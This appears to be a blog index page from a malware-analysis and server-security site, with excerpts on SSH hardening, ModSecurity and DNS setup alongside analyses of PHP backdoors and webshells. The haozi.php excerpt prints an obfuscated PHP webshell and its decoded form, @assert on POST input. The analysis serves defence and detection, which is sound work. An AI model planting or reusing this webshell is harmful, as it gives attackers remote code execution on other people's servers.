Top

Disable Password Authentication on Server

When Password-based authentication mechanism is active, meaning that your server is still exposed to brute-force attacks. We want to Disable Password Authentication on Server’s, where we use ssh access to console. Before completing the steps in this section, make sure that you either have SSH key-based authentication configured for the root account on server, or […]

Continue Reading

WordPress hidden cookie (wp_cookie)

We found very old and hidden WordPress cookie, which named wp_cookie. This allows an attacker to run anything on the compromised user website with user permissions. wp_cookie This is a very clever attack method that allows arbitrary commands to run on a server with ignoring any server security software, just like normal PHP code. Also, […]

Continue Reading

Thumbs.php

Today we found new Thumbs.php encoded malware, which trying to hide PHP code to unreadable. This technique is not nothing new, so this is very easy de-obfuscate PHP code and make it readable again. After we manually decoded this PHP malware, we found again FilesMan backdoor which is PHP command shell. Decoded Thumbs.php FilesMan – […]

Continue Reading

Configure SSH Key Authentication on a Linux Server

SSH, or secure shell, is an encrypted protocol used to administer and communicate with servers. When working with a Linux server, chances are, you will spend most of your time in a terminal session connected to your server through SSH. SSH keys provide an easy, yet extremely secure way of logging into your server. For […]

Continue Reading

haozi.php

Our honeybot catch up again new malware, which is very simple but clever. First look this looks nothing, because there are many PHP style comments in code. haozi.php @$_=”s”.”s”./*-/*-*/”e”./*-/*-*/”r”;@$_=/*-/*-*/”a”./*-/*-*/$_./*-/*-*/”t”;@$_/*-/*-*/($/*-/*-*/{“_P”./*-/*-*/”OS”./*-/*-*/”T”}[/*-/*-*/0/*-/*-*/]); If we remove comment’s away, then code look’s like: @$_=”s”.”s”.”e”.”r”;@$_=”a”.$_.”t”;@$_(${“_P”.”OS”.”T”}[0]); Final if we put this more readable, this is Assert POST: @$_=”a”.”s”.”s”.”e”.”r”.”t”;@$_(${“_P”.”OS”.”T”}[0]); Final Decoded haozi.php @assert(${“_POST”}[0]); […]

Continue Reading

Find and disable ModSecurity rule

In this article we show how to find and disable ModSecurity rule that might be causing 406 errors on your websites on either your VPS (Virtual Private Server) or dedicated server. The rules that ModSecurity uses can help block potential attack attempts from malicious users, but sometimes it can also block legitimate requests, and knowing […]

Continue Reading

Attacks in Pagelines for WordPress themes

Last few days we have seen very much attacks this old Pagelines WordPress theme vulnerability. Sucuri discovered Pagelines vulnerability on January 2015. Technical Details Any website using vulnerable version of the platform theme (<1.4.4) is risk Privilege Escalation and Remote Code Execution. ModSecurity Audit log, Payload [27/May/2017:02:32:09 +0300] WSi6@VQikyQAAErqcawAAAAg 93.170.77.90 37930 127.0.0.1 80 –5367c063-B– POST […]

Continue Reading

cPanel Finder

cPanel Finder/Cracker This cPanel Finder malware look last updated at 01 June 2015, but Malware Signatures not detected this before today added our database. Final words Use Malware Expert – Signatures detect this backdoor malware from files for FREE!

Continue Reading

CowoKerensTeam File Manager

The malware is a PHP File Manager – a script, which when installed on a compromised system, presents a sophisticated administration platform allowing the attacker to browse the filesystem of the compromised server, upload, create, edit, download or delete files. CowoKerensTeam File Manager Today we found new PHP webshell, what we have not seen before […]

Continue Reading

Delegate subdomain cloudflare to other DNS servers

There are many examples where you may need to have a specific subdomain’s DNS be managed by a different nameserver. The example we want delegate rbl.malware.expert another Bind DNS server for RBL database queries. First we need Primary Domain (malware.expert) add new NS Records rbl.malware.expert: Then we need also A-Record rbl2.malware.expert to point BIND-DNS server […]

Continue Reading